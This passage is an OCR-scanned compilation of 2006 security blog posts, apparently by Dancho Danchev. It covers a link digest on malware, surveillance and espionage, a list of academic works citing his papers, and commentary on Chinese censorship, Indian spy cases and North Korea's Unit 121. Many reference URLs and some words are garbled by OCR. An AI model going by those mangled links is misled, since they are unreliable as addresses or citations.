8. 
9. 


ttp://www.washingtonpost.com/wp-dyn/content/article/2006/07/05/AR2006070501489_pf.htm 
http: //ddanchev. blogspot .com/2006/02/end- of-passwords-for-sure-but-when.htm 
ttp://ddanchev. blogspot .com/2005/12/how-to-create-better-passwords-why.htm 


ttp://ddanchev. blogspot .com/2005/12/insiders-insights-trends-and-possible.htm 


2.7.7 Delicious Information Warfare - 27/07 (2006-07-08 01:25) 


Given the interest in the perspective, I’m continuing to share my daily reads for the last week 
and a half. Catch up with [1]previous [2]summaries, and see [3]the big picture as well. 
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01. ([4]The fine art of shoulder surfing - Many hackers download their tools but tradi- 
tionalists skilled in shoulder surfing still pose a threat. to [5]Security on july 2 


02. [6]VCs discuss the next big things - Cell phone gambling in China and other wire- 
less trends are what venture capitalists at Brainstorm were talking about. to [7]lnvesting 
[8]Mobile on july 2 


03. [9]Life After Privacy - Personal information is no longer personal. The only question 
is: who gets to see it? to [10]Security [11]Privacy on july 2 


04. [12]Spy Agency Sought U.S. Call Records Before 9/11, Lawyers Say - The U.S. Na- 
tional Security Agency asked AT &T Inc. to help it set up a domestic call monitoring site seven 
months before the Sept. 11, 2001 attacks, lawyers claimed June 23 in court papers filed in 
New York federal court. to [13]lntelligence [14]Surveillance [15]Wiretapping [16]Terrorism 
[17]NSA on july 2 


05. [18]MySpace, a place without MyParents - Scott Granneman looks at the mass hys- 
teria surrounding MySpace social security issues, examines a collection of frightening reports, 
and then discusses the real issue of parenting and parental supervision behind keeping our 
children safe. to [19]Security [20]NewMedia [21]MySpace on july 2 


06. [22]Limiting Vulnerability Exposure through effective Patch Management: threat 
mitigation through vulnerability remediation - This document aims to provide a complete 
discussion on vulnerability and patch management. It looks first at the trends relating to 
vulnerabilities, exploits, attacks and patches. These trends provide the drivers of patch and 
vulnerability management. to [23]Vulnerabilities [24]Oday on july 2 


07. [25]’Blue Pill’ Prototype Creates 100 % Undetectable Malware - Joanna Rutkowska, 
a stealth malware researcher at Singapore-based IT security firm COSEINC, says the new Blue 
Pill concept uses AMD’s SVM/Pacifica virtualization technology to create an ultra-thin hypervi- 
sor that takes complete control of the underlying.. to [26]Malware [27]Rootkit [28]Technology 
on july 2 
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08. [29]Hacker attacks hitting Pentagon - "This stuff is enormously important," said 
John P. Stenbit, the Pentagon’s chief information officer until 2004. "If the keys get into the 
wrong hands, all kinds of bad things happen. to [30]Defense [31]InformationWarfare on july 2 


09. [32]Data Mining Myspace Bulletins - | was able to whip together a small C program 
that generates urls, retrieves the bulletin, and saves the html to a file. Once all of the data 
has been downloaded, it’s easy to parse through using a tool like grep. to [33]Security 
[34]NewMedia [35]MySpace on july 2 


10. [36]How A Trigger Set Off A Logic Bomb At UBS PaineWebber - A forensics investi- 
gator testifying at the computer sabotage trial of a former systems administrator for UBS 
PaineWebber detailed how each line of code in the trigger helped set off a devastating logic 
bomb. to [37]Insider [38]Malware on july 2 


11. [39]On the Economics of Information Security - Papers - The Fifth Workshop on the 
Economics of Information Security (WEIS 2006). to [40]Security [41]Leadership on july 2 


12. [42]What’s Wrong with This Picture? - A messy desk is a vulnerable desk. We’ve 
created one with 20 egregious violations of a good policy. See if you can find them. to 
[43]Security [44]Workplace on july 2 


13. [45]Space attack on satellites could be devastating - If the US does not protect its 
Earth-orbiting satellites, the equivalent of a car bomb in space could take the economy back to 
the 1950s, according to witnesses testifying in Washington DC earlier this week. to [46]Military 
[47]Satellite [48]Space [49]SPAWAR on july 2 


14. [50]Air Force to spend $450K datamining blogs for war on terror - The Air Force Of- 
fice of Scientific Research recently began funding a new research area that includes a study 
of blogs. Blog research may provide information analysts and warfighters with invaluable 
help in fighting the war on terrorism. to [51]Intelligence [52]Terrorism [53]Surveillance 
[54]Technology on july 2 


15. [55]How Did U.S. Assess Iraqi Bioweapon Production? - One of the most vivid alle- 
gations made by the U.S. government regarding Iraqi weapons of mass destruction was the 
claim that Iraqi had developed mobile laboratories for the production of biological weapons. 
to [56]Intelligence on july 2 
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16. [57]Month of Browser Bugs - | will publish one new vulnerability each day during 
the month of July as part of the Month of Browser Bugs project. to [58]Vulnerabilities [59]Oday 
[60]Metasploit on july 3 


17. [61]IM’s Hidden Dangers - But unlike water-cooler chatter, IMs leave a trail—one 
that can be tracked by employers, regulators, and law-enforcement officials. And like e-mail, 
IMs are considered legal documents. to [62]IM [63]Compliance on july 6 


18. [64]Trend Micro Execs Face Probe - Agency may charge CEO and her husband with 
trading in shares of his former company, SINA. Trend Micro reported revenues of $621.9 
million in 2005, compared with $587.4 million in 2004. The company currently has nearly 
3,000 employees around the world. to [65]Investing [66]AntiVirus on july 6 


19. [67]Blast from the past: '50s Nevada A-bombs light LA’s night sky - In the early 
1950s, several above-ground atom bomb tests at the Nevada Proving Ground were visible in 
Los Angeles. This photo and five similar ones from 1951-1955 are from the Los Angeles Public 
Library Photo Database. to [68]Defense [69]Nuclear [70]Technology on july 6 


20. [71]FOIA at Forty - The fortieth anniversary of the Freedom of Information Act, signed into 
law by President Johnson on July 4, 1966, was marked with the release of several interesting 
and informative publications. 


to [72]FOIA on july 6 


21. [73]Early Days On The Anti-Virus Front: A Personal Perspective - An anti-virus pro- 
grammer reminisces about the people and the organizations that were pivotal in the earliest 
days of the war against computer viruses. 


to [74]Malware [75]AntiVirus on july 6 


22. [76]The Blue Pill Hype - The working prototype | have (and which | will be demon- 
strating at SyScan and Black Hat) implements the most important step towards creating such 
malware, namely it allows to move the underlying operating system, on the fly, into a secure 
virtual machine. to [77]Malware [78]Rootkit [79]Innovation on july 6 
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23. [80]New PoC virus can infect both Windows and Linux - The virus is interesting, 
said analysts on Kaspesky’s Viruslist website, because it is capable of infecting ELF, the file 
format used for Linux systems, and PE, Windows’ file format. to [81]Malware on july 6 


24. [82]lranian intelligence services ban access to Azerbaijani websites - He reported 
that the ban aims at depriving Iranian Azerbaijanis of the contact with the international 
community. to [83]Censorship [84]Intelligence [85]lran on july 6 


25. [86]Can the N.Y. Times Be Charged Under the Espionage Act? - Can The New York 
Times be prosecuted for their story about the government’s secret terrorist finance tracking 
program? to [87]Intelligence [88]Espionage [89]Terrorism [90]FreeSpeech on july 6 


26. [91]Text messaging censorship: PITA, BFD, or BTHOM? - Text messaging and the 
first level of censorship begins at the phone. While it’s certainly possible to enter any word 
using the alphabetic method in which a=2, b=2-2, c=2-2-2, d=3 and so on, it isn’t very 
convenient. to [92]Censorship [93]Mobile on july 6 


27. [94]lran Accuses Academic Of Espionage For U.S. - Iran today accused jailed aca- 
demic Ramin Jahanbegloo of having spied for the United States, with the aim of toppling the 
ruling Islamic system. to [95]Intelligence [96]Espionage [97]lran on july 6 


28. [98]ltalian intelligence officials arrested over CIA kidnap - Italian police arrested 
two Officials with Italy’s military intelligence agency on Wednesday on suspicion of helping 
the CIA in the alleged kidnapping of a terrorism suspect in Milan, judicial sources said. to 
[99]Intelligence [100]Espionage [101]CIA on july 6 


29. [102]New York Times Draws Criticism Over Decision to Reveal Intelligence Program 
- Executive editor of the New York Times Bill Keller and former director of the NSA Admiral 
Bobby Inman debate the newspaper’s publication of the Bush administration’s surveillance of 
banking records and the process in deciding what is fit to print. to [103]FreeSpeech on july 6 


30. [104]Hackers May Lose Nuclear Option - The risk was illustrated in 2003, when the 
Slammer worm penetrated a network at the idled Davis-Besse nuclear plant in Ohio, disabling 
a safety monitoring computer for nearly five hours. to [105]SCADA [106]Nuclear [107]Cybert- 
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errorism [108]Malware on july 7 


31. [109]3 arrested in Coca-Cola trade secret scheme - "As the health of our enterprise 
continues to strengthen and the breadth of our innovation pipeline continues to grow, our 
ideas and our competitive data carry increasing interest to those outside our business." to 
[110]Insider [111]Espionage on july 7 


32. [112]Proactive Protection: a Panacea for Viruses? - The first in a series of articles 
that discuss the newest technologies used by antivirus companies which focuses on proactive 
technologies. to [113]Malware [114]Innovation on july 7 


33. [115]Japan to speed up installation of missile defense system - The envisioned mis- 
sile defense system will detect launches of ballistic missiles with Aegis and other sophisticated 
radar systems and shoot them down with the sea-based Standard Missile-3 and the land-based 
Patriot Advanced Capability-3. to [116]Defense [117]Military on july 7 


34. [118]FCC CALEA Wiretap Rule for Broadband and VOIP - This document addresses 
the assistance capabilities required, pursuant to section 103 of the (CALEA- for facilities-based 
broadband Internet access providers and providers of interconnected Voice over Internet Pro- 
tocol (VoIP). to [119]Security [120]Terrorism [121]Intelligence [122]Wiretapping [123]CALEA 
[124]VoIP [125]Compliance on july 7 


35. [126]Tensions Ramping up with North Korea - "The U.S. was hell bent on espionage 
over military objects of the DPRK in March when it staged large-scale RSOI! and "Foal Eagle" 
joint military exercises, bringing about the dark cloud of nuclear warfare." to [127]Defense 
[128]Military [129]Reconnaissance on july 7 


36. [130]Over 1,200 Cases of U.S. Aerial Espionage - Translated 2004 News Items - In- 
volved in the aerial espionage were latest reconnaissance planes of different missions 
including U-2, RC-135, E-8C, E-3, RC-7B, RC-12, RF-4, P-3 and EP-3. to [131]Espionage 
[132]Military [133]Reconnaissance on july 7 


37. [134]Interview : An Ethical Hacker Protects the World Cup Network - Dr. Tom Porter is 
the mastermind behind the security for the World Cup network and a lifetime hacker himself. 
He shares his thoughts about network security, hacking and protecting the World Cup network. 
to [135]Security [136]Interview [137]Leadership on july 7 


38. [138]Google’s Microsoft Syndrome - Google has fixed a security flaw in its RSS reader that 
could have allowed hackers to steal users’ personal information, but experts warned Thursday 
that the online giant could increasingly become a magnet for hackers, displacing Microsoft as 
the No. 1 target to [139]Vulnerability [140]Google [141]NewMedia [142]Web on july 7 


39. [143]Hefty bill for online click fraud - Online advertisers paid more than $800m 
last year for fraudulent clicks on their ads and more than a quarter of them have reduced 
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their spending as a result, according to a study by the Outsell media research firm. to 
[144]NewMedia [145]Advertising [146]Investing on july 7 


40. [147]BitDefender Ships Anti-Rootkit Beta - The anti-virus vendor, based in Bucharest, 
Romania, on July 7 lifted the wraps off a new anti-rootkit utility that promises to spot and 
delete stealthy software programs that are used by malicious hackers to hide malware. to 
[148]Malware [149]AntiVirus [150]Rootkit [151]Technology on july 7 


41. [152]VPN market to hit $29bn by 2009 - The virtual private network (VPN) services 
market was worth $23bn (£12.5bn) in 2005 and is expected to grow another 22 per cent to 
hit $29bn (£15.8bn) by 2009, according to an industry analyst. to [153]Security [154]VPN 
[155]Investing on july 7 


42. [156]US managers accused of industrial espionage - Three former US car industry 
executives have been accused of selling trade secrets to the Chinese. to [157]Espionage 
[158]Insider on july 7 


43. [159]Mod terror documents found in ditch - According to the newspaper, it includes 
phone numbers for the UK’s most important military figures, such as the Defence Secretary, 
Chief of Defence Staff and Director of Special Force. to [160]Security on july 7 


44. [161]Authorities say gangs using Internet - Some of the country’s most notorious 
street gangs have gotten Web-savvy, showcasing illegal exploits, making threats, and 
honoring killed and jailed members on digital turf. to [162]PSYOPS on july 7 
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. http: //del.icio.us/DDanchev?settagview=cloud 
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156. http://motoring.reuters.co.uk/reuters/vocmain. jsp?1nk=101&amp ; id=1778&desc=%20US/%20managers/,20accusedy, 


57. http: //del. icio.us/DDanchev/Espionage 

. http: //del. icio.us/DDanchev/Insider 

_ http://www. guardian. co.uk/uklatest/story/0, ,~5933384, 00. html 
_ http: //del.icio.us/DDanchev/Security 
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. http://www. boston. com/news/nation/articles/2006/07/06/authorities_say_gangs_using internet/ 


162. http://del.icio.us/DDanchev/PSYOP 


2.7.8 Security Research Reference Coverage (2006-07-09 18:27) 


I’ve recently started getting more requests on participating or guiding to a certain extend, 
student theses and various other research papers. There’s nothing more pleasant than 
exchanging points of view, don’t preach, but teach and question everything is what | have in 
mind. So, I’ve decided to share some publications featuring some of my previous papers, and 
by the way, I’m very near to releasing two research papers on hot topics that emerged during 
2006, so stay tuned! 
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Online Media 

- [1]Quoted in an article by Arthur G. Insana for ImediaConnection.com back in 2004, 
discussing the various threats posed by trojan horses. Trouble is, I’m no longer affiliated with 
the company. Respect the individual! 


- Quoted in an article by Bill Brenner on the [2]"Storm Worm" and social engineering 
when it comes to malware in general 


- My paper on the future trends of malware got [3]Slashdotted 
- Security.nl covered [4]the International Exploits Shop in an article 


- Yet another article at Security.nl this time regarding my [5]future trends of malware pa- 
per. 


- Marc Olanié at Reseaux-Telecoms.net has been writing lots of articles regarding my re- 
search worth going through 


- [6]Microsoft, concepteur de virus 

- [7]Des truands, des failles, du business... 

- [8]Danchev sur l’Achat de failles 

- [9]Bientét, le virus et l’attaque DoS on demand 

- [10]Encore et toujours F-Secure/Kaspersky... 

- [11]Clusif : le rapport criminalité 2005, chantages et escroqueries 
- [12]Le Cyber-Jihad fait trembler l’'Amérique 

- [13]La vie secrete du phishing : 20/20 en éco et géographie 


- [14]Symantec : Boulevard du crime... et au dela 


Research Papers/Academic 


[15]- [16]Future of Malicious Code references my future trends of malware paper. Here’s the 
[17]French version 
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- [18]Entwurf eines Kunstlichen Immunsystems zur Netzwerkuberwachung auf Basis eines 
Multi-Agenten-Systems references future trends of malware 


- [19]Limiting Vulnerability Exposure through effective Patch Management: Threat Mitiga- 
tion Through Vulnerability Remediation references my best practices on security policies 


- [20]Developing a Security Policy refences my paper on security policies 


- [21]Policy Review references my paper on security policies 


- Hu Xiaodong, “[22]Security Centre for an Enterprise thesis”, CS Department, Stockholm’s 
University, references [23]Building and Implementing a Successful Information Security Policy 


- Jingiao Yu, "[24]TRINETR: An Intrusion Detection Alert Management and Analysis Sys- 
tem dissertation", College of Engineering and Mineral Resources at West Virginia University, 
references [25]Building and Implementing a Successful Information Security Policy 


- Philippe Farges and Annick Tremblet, "[26]Project on Trojans", Department of Computer 
Science Linkoping Institute of Technology, Sweden, references [27]/The Complete Windows 
Trojan Paper 


- Fausi Qattan & Fredrik Thernelius, "[28]Deficiencies in Current Software Protection Mech- 
anisms and Alternatives for Securing Computer Integrity", Department of Computer and 
Systems Sciences 


Stockholm University - Royal Institute of Technology, references The Complete Windows 
Trojan Paper 


- Computer Knowledge, "[29]Virus Tutorial" references The Complete Windows Trojan Pa- 
per 


- Reyes, Juan Carlos, "[30]Una Aproximaci6én Tedrica a la Prevencién del Factor Humano 
en la Seguridad Informatica", references [31]Reducing "Human Factor" Mistakes 


- Rezan Fisli, "[32]Secure Corporate Communications Over VPN-Based WANs", references 
[33]Building and Implementing a Successful Information Security Policy 


- Vo Khac Thanh, "[34]An IT security policy framework", Asian Institute of Technology 
SAT : School of Advanced Technologies, references [35]Building and Implementing a Success- 
ful Information Security Policy 


- Rohmadi Hidayat, "[36]Deteksi Trojan Dan Penanganannya", references The Complete 
Windows Trojan Paper 
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- Robert J. Kaufman III, "[37]Susceptibilities Policy Review (Top-Down Methodology) Lesson 7 
PPT", The University of Texas at San Antonio, College of Business, references [38]Building and 
Implementing a Successful Information Security Policy 


- "[39]Trends of Spyware, Viruses and Exploits", references [40]Malware - it’s getting worse 


- Steven M. Michnick, "[41]Information Security Framework for Small and Medium Sized 
Businesses", references [42]Passwords - Common Attacks and Possible Solutions 


- Samer Catalan, "[43]Trojan Horses", RWTH Aachen University, references The Complete 
Windows Trojan Paper 


- Stephen M. Specht and Ruby B. Lee, "[44]Distributed Denial of Service: Taxonomies of 
Attacks, Tools, and Countermeasures", Proceedings of the 17th International Conference on 
Parallel and Distributed Computing Systems, International Workshop on Security in Parallel 
and Distributed Systems, references The Complete Windows Trojan Paper 


- Delwyn Lee, Adam Marks, David Bell, “[45]Student Residence Secure Solutions Analy- 
sis of ResNet Security”, references [46]Building and Implementing a Successful Information 
Security Policy 


- Clarissa L. Evans Brown, “[47]A Policy to prevent outsider attacks on the local network”, GSEC 
Practical Assignment, references [48]Building and Implementing a Successful Information 
Security Policy 


- Hatim Ali Badr, “[49]Online home users Defense in Depth”, GIAC Practical Assignment, 
references The Complete Windows Trojan Paper 


- Tim Strong, “[50]PestPatrol in a Corporate Environment: A Case Study in Information 
Security” - GIAC Practical Assignment, references The Complete Windows Trojan Paper’s 
Future of Trojans section 


- Sorcha Canavan, "[51]An Information Policy Development Guide for Large Companies" 
- GSEC, Practical Assignment, references [52]Building and Implementing a Successful Infor- 
mation Security Policy 


- Gregory R. Panakkal, “[53]Advanced Survival Techniques in Malware”, Cochin Univer- 
sity of Science and Technology, references The Complete Windows Trojan Paper 
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- Michael D. Thacker, "[54]Effective Security Policy Management” - Virus Bulletin 2005 
Conference, references [55]Building and Implementing a Successful Information Security 
Policy 


- My paper regarding security policies has been discussed in a [56]network security course at 
the George Mason University 


- University of Melbourne’s [57]Network Security Course teaches on my security policies 
publication 


- [58]University of Houston are giving assignments on my security policies publication 


- Tim Lackorzynski, "[59]Future Trends of Malware PPT", Fakultat Informatik, Technische 
Universitat Dresden, [60]Proseminar Dependable Systems is discussing my "[61]Malware - 
Future Trends" research 


- Widener University have included my "[62]Steganography and Cyber Terrorism Com- 
munications" in their [63]forensics course reading materials 


. http://www. imediaconnection.com/content/4100.asp 
. http://searchsecurity.techtarget.com/columnItem/0, 294698, sid14_gci1240768, 00. htm 


ttp://it.slashdot.org/article.pl?sid=06/01/11/1323212&tid=172 


1 

2 

3 

4. http://www.security.nl/article/13099/1/Internationale_Exploit_Shop_levert_Odays_op_bestelling.htm 
5, http://www. security n/article/12808/1/De, toekonst_van,nalwvare. html 

6. http://securite.reseaux-telecoms.net/actualites/lire-microsoft-concepteur-de-virus- 12754. htm 

7. http://securite.reseaux-telecoms.net/actualites/lire-des-truands-des-failles-du-business- 13219 htm 
8. http://securite.reseaux-telecoms.net/actualites/lire-danchev-sur-1-achat-de-failles-12703.htm 

9 


ttp://securite.reseaux-telecoms.net/actualites/lire-bientot-le-virus-et-1-attaque-dos--on-demand-12182. 


ttp://securite.reseaux-telecoms.net/actualites/lire-encore-et-toujours-f-secure-kaspersky- 15444. htm 


11. ttp://securite.reseaux-telecoms.net/actualites/lire-clusif-le-rapport--criminalite-2005--chantages-et- 


escroqueries-12230.htm 


12. http://securite.reseaux-telecoms .net/actualites/lire-le-cyber-jihad-fait-trembler-1-amerique- 15053. htm 


13. http://securite.reseaux-telecoms.net/actualites/lire-la-vie-secrete-du-phishing-20-20-en-eco-et-geograp 


3 
ie-15609.htm 
4 


14. 


ttp://securite.reseaux-telecoms .net/actualites/lire-symantec-boulevard-du-crime-et-au-dela-15831.htm 
15. 
16. 
17. 
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. http: //www.dai-labor .de/fileadmin/files/publications/Diplomarbeit_KL. pdf 
. http: //singe.za.net/masters/thesis/Dominic/20White/%20-%20MSc%20-%20Patch/20Management . pdf 


20. 
21. 

22. 
23, 

24, 

25, 


. bttp://www.ida.liu.se/%7ETDDC03/oldprojects/2004/final-projects/prj028.pdf 


. http: //www.windowsecurity.com/whitepapers/The_Complete_Windows_Trojans_Paper.htm 


28. 
29. 
. http: //www.seltika.com/archivos/Aproximaci{C3/B3n/,20Te/C3/,B3rica/20a,20la/20prevenci/,C3/,B3n/4,20de1%,20Facto 
. http: //www.windowsecurity.com/articles/Reducing Human_Factor_Mistakes.htm 
. bttp://www.nada.kth.se/utbildning/grukth/exjobb/rapportlistor/2005/rapporter05/fisli_rezan_05182.pdf 


33. http://www.packetstormsecurity.org/papers/general/security-policy.pdf 


34. http://www.library.ait.ac.th/ThesisSearch/summary/Vo/20Khac/%,20Thanh . pdf 


35. http://www.infosecwriters.com/text_resources/pdf/security-policy.pdf 


. bttp://budi.insan.co.id/courses/e17010/dikmenjur-2004/rohmadi-report . pdf 


37. http://faculty.business.utsa.edu/rkaufman/SRALsn7 .ppt 

38. 

39. 

40. 

41. 


42. http: //wiw.windowsecurity.com/articles/Passwords-Attacks-Solutions.htm 


. http: //www-i4.informatik.rwth-aachen.de/lufg/teaching/ss2004/dependability-seminar/paper/final8. pdf 


44. http: //palms.ee.princeton.edu/PALMSopen/DDoS%20F inal/,20PDCS%20Paper . pdf 


45. http://web.syr.edu//7Eatmarks/docs/623/Student .doc 
46. http: //www.packetstormsecurity.org/papers/general/security-policy.pd 


http: //cnscenter.future.co.kr/resource/security/consulting/1362.pd 


52. http://www.packetstormsecurity.org/papers/general/security-policy.pd 


47. : é CO .pdf 
48. http: //www.packetstormsecurity.org/papers/general/security-policy.pd 
49. http: //www.giac.org/certified_professionals/practicals/gsec/2780.php 
50. http://www. giac.org/certified_professionals/practicals/gsec/2314.php 
51. http://www.cbts.cinbell.com/test/doc/largecompanysecuritypolicy. pdf 


. http://www. infogreg.com/articles-dir/export/seminar_report_astim.pdf 


54. 

55. 

56. http: //teal.gmu. edu/%7Egmartin/fall05/tcom562-f05.htm 

57. 
. bttp://dcem.cl.uh.edu/nsfsecurity/public/Modules/AYang Module/admii/Assignment1/AdmiilAssign1.htm 
. http: //wwwse.inf.tu-dresden.de/wiki/images/f/£6/PRO-TimLackorzynski . pdf 


. http: //wwwse.inf.tu-dresden.de/wiki/index.php/Proseminar_Topics 


61. http://www.packetstormsecurity.org/papers/general/malware-trends . pdf 
62. http: //ddanchev. blogspot . com/2006/08/steganography-and-cyber-terrorism. htm 
63. http://cs.widener.edu//%7Eyanako/html/courses/Fall06/forensics/coursemat.htm 
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2.7.9 South Korea’s View on China’s Media Control and Censorship (2006-07-10 22:21) 


[1] 


C IP 


Got bored of [2]China’s Internet censorship efforts, and its [3]interest to control mobile 
communications as well? | haven’t, and | doubt | ever will given China is among the many 
other [4]countries on the world’s map actively restricting access to information, and, of course, 
controlling the way it reaches the final audience - if it does. 


A recent article at [5]The Korean Times, makes some very good points on the cons of 
censoring the reporting of "sudden events", and the typical for a (modern) communist type of 
government, total centralization. It emphasises on how : 


"Beijing’s approach is fundamentally flawed. The news media is a positive force in soci- 
ety. A free press is necessary to keep the government on its toes, especially when the 
government itself is not accountable to the public. Restricting the press will result in a public 
that is kept in the dark and in local governments whose excesses will no longer be subject to 
scrutiny. 


Beijing should understand that many of today’s problems today stem from abusive local 
Officials. Premier Wen Jiabao acknowledged at a press conference in March that some local 
governments have infringed upon the legitimate rights and interests of the people, and social 
conflicts have subsequently occurred. 


In this struggle between victimized farmers and avaricious officials, the press—and the 
central government—are on the same side. Muzzling the press will only deprive the victims 
of a powerful champion while enabling grasping officials to line their pockets without fear of 
being exposed. Surely, this cannot be what the Chinese government wants." 


In case of a "sudden event" | feel they’d rather be winning time compared to keeping it 
quiet, then again | guess ruling one of the largest nation in the world while trying to maintain 
stability - [6]FDI matters folks - is a dauting task, but one not necessarily having to do with 
ignoring the situation. Government accountability and possible changes in voting attitudes 
in China don’t exist, mainly because there isn’t any other party, but THE party, therefore 
historical (under)performance doesn’t count at all. 


In comparison, whereas Chinese citizens suffer from the lack of information or the blocked 
access to it, in the U.S there’s [7]a controversial debate going on regarding over-performing 
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investigative journalists revealing details thought to be sensitive to national security, and 
the overall availability of potentially sensitive information to the general public. The problem 
isn’t the "leak" as it’s a common sense practice, but the publicity it got in the post 9/11, 
privacy-preserving society - or at least one [8]trying to. Doesn’t really matter if [9]the FOIA 
turned forty, [10]"redacting" is often misspelled for censorship, [11]in between the lines of 
personal and sensitive information. 


At the bottom line, government practices’ transparency with the help of the media watchdogs, 
a government incapable of knowing the exact state of a situation by itself, or the notion of 
too much publicly available information in today’s OSINT world, up to you to decide, just don’t 
rule, run business, or blog, by excluding the middle, or you’ll sooner or later face with it in one 
way or another. 


http: //photos1. blogger. com/blogger/1933/1779/1600/Censorship. jpg 
ttp://ddanchev. blogspot .com/2006/02/chinese- internet-censorship-efforts.htm 


ttp://ddanchev. blogspot .com/2006/07/chinas- interest-of-censoring-mobile.htm 


1. 
2. 
3. 
4 
5 
6 

: 
8. 
9. 


ttp://ddanchev. blogspot .com/2006/06/al1-your-confidentiality-are-belong-to.htm 


ttp://www.fas.org/blog/secrecy/2006/07/foia_at_forty.htm 
10. http://www.contracostatimes.com/mld/cctimes/14952653.htm 
11. http: //ddanchev.blogspot.com/2006/04/in-between-1lines-of-personal-and. htm 


2.7.10 India’s Espionage Leaks (2006-07-10 23:36) 


[1] * You may find this brief overview of [2]Indian security’s leaky past cases informative : 


- "Defence Research and Development Organisation (DRDO) hard drive theft. 
The hard drives were stolen from the offices of the Scientific Analyses Group (SAG) and 
the Institute for System Studies and Analyses (ISSA) inside the DRDO complex. The SAG is 
responsible for cryptography. In other words, all codes and cyphers to ensure communication 
security for the defence forces have an SAG stamp. The ISSA, on the other hand, analyses 
competing weapons systems for induction into the armed forces." 


- "Rabinder Singh. It is said there was a question mark over his reliability since the 
early 1990s when he began an operation for the collection of intelligence about US govern- 
ment activities in South Asia through a sister of his, who was employed in a sensitive US 
agency with links to the CIA." 


- "Rattan Sehgal. The /B’s counter-intelligence division reportedly found that a woman 
CIA officer posted in the US embassy was in contact with government servants and others on 
a mobile telephone, allegedly registered in the name of their boss, the suspect IB officer." 


- "KV Unnikrishnan. During those jaunts in Singapore, compromising photographs of 


the stewardess and her lover were taken. These photographs and other documents were 
recovered by mid ’86 and it was learnt that Unnikrishnan was working for the CIA." 
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- "Larkins Brothers. The Larkins’ interrogations led to the arrest of Singh and it was 
found that Jockey and Bud were CIA operatives." 


- "Samba Spy Case. By 1974, he began working for its army’s Field Intelligence Unit 
at Sialkot on a regular basis. In the June of 1975, Dass was arrested on suspicion of espionage 
but by then he had persuaded some of his colleagues (including a certain Aya Singh) to 
become accomplices." 


Understanding the past means predicting or at least constructively speculating on the 
future. Insider leaks due to HUMINT recruitment activities may seem to have vanished given 
the increasing number of IT-dependent infrastructures and the insecurities their connectivity 
brings - [3]SIGINT taking over [4]HUMINT [5]espionage. While [6]modern spy gadgets remain 
trendy, this very same connectivity has resulted in various [7]hacktivism tensions in the 
past, namely the [8]India vs Pakistan [9]cyberwar, and, of course, [10]MilWOrm’s infamous 
speculation on [11]breaching India’s Bhabha Atomic Research Center through the use of U.S 
military servers as [12]island-hopping points. 


Office surveillance graph courtesy of [13]BugSweeps. 


_p://photost blogger .con/blogger/1999/1770/1600/c8tice_eaplonage.jpd 
_hetp://wiv.bindustant ines .con/neus/401_ 1739400, 0008. 

| http: //en, wikipedia, org/wiki/STGIN 

_petp:/ /en. wikipedia. ong/vSki/ AUNT 

 ftep://4el 4cio,ue/DDencher/Eapionag 


ttp://www.forbes.com/technology/2006/04/15/intelligence-spying-gadgets_cx_lh_06slate_0418tools.htm 


| http://adanchey blogspot con/2006/07 /nacktivisn-tensions~israel-vs hin 
_http://svy wire. con/nevs/politice/0, 1289, 40789, 00. hem 

_ http: //nwy cnn, con/TBCH/ computing/9910/08/pakistani.nack/ 

10, rep: //ww. reait.con/computer/1908/jun/ODbarc. hen 

11. http://www. exn.ca/Stories/1998/06/08/60. asp 


1 
2 
3 
4 
5 
6 
7 
8 
9 


12. http://en.wikipedia.org/wiki/Island_hopping 


13. http://www. bugsweeps.com/info/spytech.htm 
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2.7.11 Spreading Psychological Imagination Streams (2006-07-14 16:54) 


[1] Wish | could reference all the copywriting materials 
I've ever written and got commissioned for, but I’d rather we play a "words creativity" 
game. There’s no better personal benchmark for keeping yourself in a good shape, and most 
importantly, indirectly summarizing what’s going on in my head at a particular moment, than 
of coming up with random/instant sentences out of key words | come across to while reading 
an article. Enjoy, and remember a key word is worth a thousand sentences! 


Wordlist : 

- Breed 

- Cupidity 

- Intermediaries 
- Powerhouse 

- Quadrupled 

- Commodities 
- Proliferation 

- Liquidity 

- Licensing 

- The arms race 
- Competitiveness 


Outcome : 
- The boom of the Web, and the now experienced dotcom industry, has generated a whole new 
breed of wannabe entrepreneurs 


- From some people’s point of view, cupidity is just profit-maximization 


- Among Dell’s most important strategic objectives were to cut the intermediaries, thereby 
lowering the final price of a PC and stealing market share. Trouble is, hardware turned into a 
commodity these days 


- AOL - the Internet’s powerhouse from the early days of the Web itself, got the neces- 
sary attention from both, Microsoft, and Google due to the highly competitive atmosphere the 
rivals created. Eyeballs converted into revenue sources 


524 


- Since the standartization of advertising creative, online ad revenues quadrupled 


- Commodity markets are the true nirvana when it comes to betting and the potential to 
gain enormous returns in a short period of time 


- The proliferation of false statements by the Senator, has resulted in decline in our sales due 
to privacy concerns 


- Achieving liquidity should be issue number one for a less capital goods intensive orga- 
nization 


- Licensing not only cuts R &D costs, it also provides a company with the ability to gain 
competitive advantage, and improve its value-added proposition next to its rivals’ ones 


- The arms race in patents and brands registering across the world, has resulted in a 
great deal of still unused, and in beta mode of testing technologies and names 


- The competitiveness in the Business Services market segment that IBM was seeking, is 
among the main reasons for their sale of the company’s entire PC units devision - today’s 
Lenovo 


An analysis of hard cover security ads from the most popular business magazines will 
follow at the beginning of the week. Actual shots, the messages themselves and detailed 
recommendations are to be included as well. Information security and business always tend 
to intersect, excluding one is like ignoring the other. 


1. http://photos1.blogger .com/blogger/1933/1779/1600/creativity. jpg 


2.7.12 North Korea’s Cyber Warfare Unit 121 (2006-07-16 01:08) 


[1] * Ina previous post, "[2]Who’s Who in Cyber Warfare" | commented on a very informative 
[3]research on the topic, and pointed out that : 


"Technology as the next Revolution in Military Affairs (RMA) was inevitable development, 
what’s important to keep in mind is knowing who’s up to what, what are the foundations of 
their military thinking, as well as who’s copying attitude from who. Having the capacity to 
wage offensive and defense cyber warfare is getting more important, still, military thinkers of 
certain countries find [4]network centric warfareor total renovation of [5]C4l communication- 
sas the panacea when dealing with their about to get scraped conventional weaponry systems. 
Convergence represents countless opportunities for waging Cyber Warfare, offensive one as 
well, as | doubt there isn’t a country working on defensive projects." 


Recently, there’s been some movement from [6]North Korea’s Cyber Warfare unit 121, 
one that : 


"North Korea set up about eight years ago with some 1,000 personnel, said the intelligence 
official, who declined to be named because it was the agency’s policy to remain anonymous. 
The North’s operation, called unit 121, "has hacked into the South Korean and U.S. Defense 
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Department" and has caused much damage in the South, the official said without elaborating." 


[7]According to [8]numerous [9]articles on recent "anomalies" at unclassified U.S state 
department systems, these might actually have to do with the group’s actions itself - quite a 
momentum to take advantage of, isn’t it? Any country’s interest in [LOJestablishing [11]cyber 
